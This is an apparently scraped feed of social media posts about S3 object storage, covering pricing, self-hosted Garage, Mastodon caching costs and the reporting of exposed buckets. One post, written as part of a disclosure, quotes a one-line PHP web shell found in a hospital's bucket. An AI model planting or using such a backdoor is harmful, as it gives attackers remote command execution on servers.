"It's five grand a day to miss our S3 exit"

https://world.hey.com/dhh/it-s-five-grand-a-day-to-miss-our-s3-exit-b8293563

two days ago a #s3 bucket containing a SQL dump with data from #volkswagen #financial #services was deleted. I reported the bucket on the 9th of March, so it took them close to three weeks to fix it.
My mail with the responsible disclosure to #vw was never answered or acknowledged.

I'm fan of #garage !
It's a distributed object storage service #S3 tailored for self-hosting.
It runs on old PCs. It's build to be resilient with geographical redundancy.

They released a new version 3 weeks ago: https://git.deuxfleurs.fr/Deuxfleurs/garage/releases

#rustlang #garagehq
/cc @deuxfleurs

How to restrict Amazon S3 bucket access to a specific IAM role: https://aws.amazon.com/blogs/security/how-to-restrict-amazon-s3-bucket-access-to-a-specific-iam-role/

Delivering #Malware Through Abandoned #Amazon #S3 Buckets

https://www.schneier.com/blog/archives/2025/02/delivering-malware-through-abandoned-amazon-s3-buckets.html

New Amazon Ransomware Attack—‘Recovery Impossible’ Without Payment

A new ransomware threat, known as Codefinger, targeting users of Amazon Web Services S3 buckets, has now been confirmed.

#AWS #amazon #S3 #codefinger #ransomware #malware #security #cybersecurity #hackers #hacking #hacked

https://www.forbes.com/sites/daveywinder/2025/01/13/new-amazon-ransomware-attack-recovery-impossible-without-payment/

just discovered some very cool new projects:
https://git.deuxfleurs.fr/Deuxfleurs/bagage
https://aerogramme.deuxfleurs.fr/

aerogramme is a proxy for imap and caldav that offers encryption and some security guarantees

bagage is webdav with an s3 backend

this is all based on garage which works great on commodity hardware. you could rent a $5/mo/tb vps from hosthatch and have decently good secure, open source, cloud storage of all the above

I just wanted to write a post about the most shocking major data leak fuckups revealed by awesome people at #38C3 but I can't because they just keep on adding new horrifying things

@0xF21D@infosec.exchange
Not necessarily when you factor in that #Mastodon is the absolute worst #Fedi platform on the planet for #admins and server operators.

I'm sure #Mozilla found out, like most Mastodon operators of large instances, that their #S3 storage #costs ballooned exponentially thanks to Mastodon's abject refusal to turn of media #caching for the whole #fediverse forcing admins and operators to cache and store all media -- from all #instances -- that pass through their instance.

Simply put, Mastodon fucking sucks as a fedi platform for admins and operators and I wouldn't be surprised if you don't see more larger instances folding in the next year.

It's an unsustainable architecture.

RE: https://infosec.exchange/users/0xF21D/statuses/113636032334271805

Your Impact on FreeBSD: 2024 Milestones and What’s Next

<https://freebsdfoundation.org/blog/your-impact-on-freebsd-2024-milestones-and-whats-next/> @FreeBSDFoundation

「Our work is entirely dependent on donations …」

Oh look, #Hetzner's #S3-compatible object storage is now generally available:

https://www.hetzner.com/news/object-storage

5.94 € base price per month, includes 1 TB of storage and 1 TB of egress traffic.

Additional egress traffic is 1.19 € per TB.

Additional storage is also about 5.94 € per TB and month (actually 0.007973 € per hour), and doesn't come with any included egress traffic.

https://www.hetzner.com/storage/object-storage/

All prices in my post include 19 % VAT; yours may be different depending on your country.

The advantage of open #s3 #buckets is that you sometimes can look at the code of a website.

The disadvantage is: you cannot unsee it. And sometimes that hurts…

https://infosec.exchange/@bucketchallenge/113585593228250025

Finding this code snippet in a #s3 #bucket which belongs to a hospital makes me feeling chilly:
"<?eval($_POST[cmd]);?>"

Beside that there is a link to Hospital Server - listing the admissions in real time including guardians.
The sql-dump with usernames/passwords in the s3 bucket is just a minor issue in this case.

Po latach odkładania, w końcu przejrzałem skrzynkę i kartony w piwnicy, w których trzymałem stary sprzęt elektroniczny „bo się kiedyś przyda”.

Pośród kłębów kabli do nieużywanych już gniazdek, zasilaczy od nie wiadomo czego, kości pamięci zawiniętych w gazety i pożółkłych myszek z kulką, znalazłem kilka skarbów:

- modem zewnętrzny Creative Modem Blaster podłączany przez szeregowe łącze RS323
- dysk twardy Samsung o porażającej pojemności 1,62 giga
- kartę graficzną S3 Trio64V+, która była jedną z pierwszych kart z zintegrowanym akceleratorem grafiki 3D
- mydelniczkę Sagem do neostrady tp

tonight I reported nine new open #s3 #buckets to #AWS. Stats at the moment: 54 Buckets reported, three closed.

Tonight I did send a responsible disclosure to a company in #Italy. Their #s3 #Bucket does have database dumps as backup. Those are with clear text passwords, what a shame!

Looking for another software recommendation, I would like to find a decent #AWS #S3 compatible GUI file transfer client for #Linux that can:
- List buckets, upload & download files
- Set ACLs and generate Signed URLs
- Customizable endpoint to use with non-AWS hosts
- Available as a Flatpak or vanilla binary

Basically, Cyberduck, but for Linux.

I know it’s in beta but is anyone using the #hetzner #s3 object store at scale?

Interested in your thoughts and comments.

https://docs.hetzner.com/storage/object-storage/overview/